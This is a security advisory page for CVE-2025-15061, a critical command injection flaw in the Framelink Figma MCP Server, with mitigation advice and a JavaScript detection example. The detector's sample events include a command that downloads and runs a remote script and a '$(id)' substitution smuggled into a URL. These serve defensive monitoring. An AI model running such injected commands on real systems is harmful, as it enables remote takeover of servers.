
CVE-2025-15061: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in Framelink Figma MCP Server

Severity: Critical
Tags: Vulnerability, CVE-2025-15061, CWE-78
Published: Fri Jan 23 2026 (01/23/2026, 03:20:19 UTC)
Source: CVE Database V5
Vendor/Project: Framelink
Product: Figma MCP Server

Description

CVE-2025-15061 is a critical OS command injection vulnerability in the fetchWithRetry method of the Framelink Figma MCP Server. A remote, unauthenticated attacker can execute arbitrary commands because user-controlled input reaches an operating-system command without neutralization of shell metacharacters. Successful exploitation gives full control of the affected server, with high impact on confidentiality, integrity, and availability; no user interaction is required, and the CVSS v3.0 base score is 9.8 (Critical). No exploitation in the wild has been reported, but the low exploitation complexity and the absence of any authentication requirement make timely mitigation essential. European organizations using this product should patch or apply the mitigations below immediately. Countries with significant digital design and creative industries, and those with higher adoption of Framelink products, are at greater risk. Defenders should enforce strict input validation, segment the network around the server, and monitor for unusual process execution by the MCP Server.

AI-Powered Analysis

AI analysis last updated: 01/30/2026, 10:08:02 UTC

Technical Analysis

CVE-2025-15061 is an OS command injection vulnerability classified under CWE-78, affecting the Framelink Figma MCP Server, specifically within the fetchWithRetry method. The vulnerability arises because the server fails to properly sanitize or neutralize special characters in user-supplied input before incorporating it into system-level command execution. This lack of input validation allows an unauthenticated remote attacker to inject arbitrary OS commands, which the server executes with the privileges of the service account running the MCP Server. The vulnerability is remotely exploitable over the network without requiring any authentication or user interaction, making it highly dangerous. The CVSS v3.0 base score is 9.8, reflecting the critical nature of this flaw with high impact on confidentiality, integrity, and availability. The attacker can gain full control over the affected server, potentially leading to data theft, service disruption, or pivoting to other internal systems. Although no public exploits have been reported yet, the vulnerability was assigned a ZDI identifier (ZDI-CAN-27877) and published in early 2026, indicating it is known and documented. The affected version is identified by a specific commit hash, suggesting the vulnerability exists in particular builds or releases of the product. The lack of available patches at the time of disclosure increases the urgency for organizations to implement compensating controls.

Potential Impact

For European organizations, the impact of this vulnerability is significant. The ability for unauthenticated remote attackers to execute arbitrary code can lead to complete system compromise, exposing sensitive design files, intellectual property, and user data managed by the Framelink Figma MCP Server. This could disrupt critical creative workflows, cause data breaches, and damage organizational reputation. Given the high CVSS score and critical severity, exploitation could result in widespread service outages and loss of data integrity. Organizations in sectors such as digital media, advertising, and software development that rely on Framelink's Figma MCP Server are particularly vulnerable. Additionally, the potential for lateral movement within corporate networks increases the risk of broader compromise. The absence of known exploits in the wild currently provides a small window for proactive defense, but the ease of exploitation and lack of authentication requirements mean that attackers could rapidly weaponize this vulnerability once exploit code becomes available.

Mitigation Recommendations

Immediate mitigation steps include applying any available patches or updates from Framelink as soon as they are released. In the absence of official patches, organizations should implement strict input validation and sanitization on any interfaces that feed the fetchWithRetry method, and where the code can be modified, remove the shell from the path entirely by invoking external programs with an argument array (for example execFile or spawn without a shell) rather than an interpolated command string, since escaping alone is the fragile fix for CWE-78. Network-level controls such as firewall rules should restrict access to the MCP Server to trusted IP addresses only. Network segmentation that isolates the server from critical internal systems limits potential lateral movement. Monitoring and logging of process execution on the MCP Server should be enhanced so that a shell or unexpected binary spawned by the service process is detected early. Additionally, consider deploying application-layer firewalls or intrusion prevention systems capable of detecting command injection patterns. Regularly review and minimize the privileges of the service account running the MCP Server to reduce the impact of a successful exploit. Finally, conduct security awareness training for administrators and developers regarding secure coding practices and vulnerability management.
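The process-execution monitoring recommended above, as an added example that is not part of the advisory or the Framelink project: a detection pass over process-creation events that flags the shape a CWE-78 exploit of a Node service leaves behind, namely the service's node process spawning a shell whose command line carries chained or substituted commands, or a binary the fallback was never meant to run. The event schema, the `mcp-svc` service account, the `curl` allowlist and all sample events are constructed for the example.

```javascript
// Added example, not the advisory's or the project's code: flag shells spawned
// by the MCP service process whose payload shows injection artefacts.
// Event fields are an assumed, simplified EDR/auditd-style schema.

// Constructed sample events (not real telemetry): a benign fallback call,
// a chained-command injection, an unrelated admin shell, and a command
// substitution attempt.
const EVENTS = [
  { ts: "2026-01-30T10:00:01Z", host: "mcp-01", parent: "node", user: "mcp-svc",
    cmdline: "/bin/sh -c curl -s https://api.figma.com/v1/files/abc" },
  { ts: "2026-01-30T10:00:07Z", host: "mcp-01", parent: "node", user: "mcp-svc",
    cmdline: "/bin/sh -c curl -s https://api.figma.com/v1/files/abc; curl http://198.51.100.7/x | sh" },
  { ts: "2026-01-30T10:01:00Z", host: "mcp-01", parent: "sshd", user: "admin",
    cmdline: "/bin/sh -c ls -la /var/log" },
  { ts: "2026-01-30T10:02:00Z", host: "mcp-01", parent: "node", user: "mcp-svc",
    cmdline: "/bin/sh -c curl -s https://api.figma.com/v1/images/$(id)" },
];

const SHELLS = new Set(["/bin/sh", "/bin/bash", "/bin/dash", "sh", "bash"]);
const SERVICE_USERS = new Set(["mcp-svc"]);   // assumed service account name
const EXPECTED_BINARIES = new Set(["curl"]);  // what the fallback is allowed to run
const METACHARS = /[;|&`]|\$\(|\$\{|\n/;      // chaining, piping, substitution

// Return the string handed to `sh -c`, or null if this is not a shell spawn.
function shellPayload(cmdline) {
  const parts = cmdline.split(" ");
  if (!SHELLS.has(parts[0]) || parts[1] !== "-c") return null;
  return parts.slice(2).join(" ");
}

// Score one event: only shells spawned by the service's node process matter.
function analyzeEvent(ev) {
  if (ev.parent !== "node" || !SERVICE_USERS.has(ev.user)) return null;
  const payload = shellPayload(ev.cmdline);
  if (payload === null) return null;
  const reasons = [];
  if (METACHARS.test(payload)) reasons.push("shell metacharacters in payload");
  const binary = payload.split(" ")[0];
  if (!EXPECTED_BINARIES.has(binary)) reasons.push(`unexpected binary ${binary}`);
  // A shell from the service is always worth logging; with reasons it is an alert.
  return { ts: ev.ts, host: ev.host, severity: reasons.length ? "high" : "info", reasons, payload };
}

// High-severity findings only; "info" entries are kept for baselining elsewhere.
function detect(events) {
  return events.map(analyzeEvent).filter((f) => f && f.severity === "high");
}

for (const alert of detect(EVENTS)) console.log(JSON.stringify(alert));
```

The benign fallback call and the admin's ssh session produce no alert; the `;`/`|` chain and the `$(id)` substitution do. In production the `parent` and `user` filters are what keep noise down, because a legitimate fallback that shells out will trip the metacharacter check only when the input was hostile, whereas any shell at all from a service that is not expected to spawn one is itself a finding.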


Technical Details

Data Version: 5.2
Assigner Short Name: zdi
Date Reserved: 2025-12-23T21:12:00.745Z
CVSS Version: 3.0
State: PUBLISHED

Threat ID: 6972f3a54623b1157cfeb6dd

Added to database: 1/23/2026, 4:05:57 AM

Last enriched: 1/30/2026, 10:08:02 AM

Last updated: 2/5/2026, 12:04:46 PM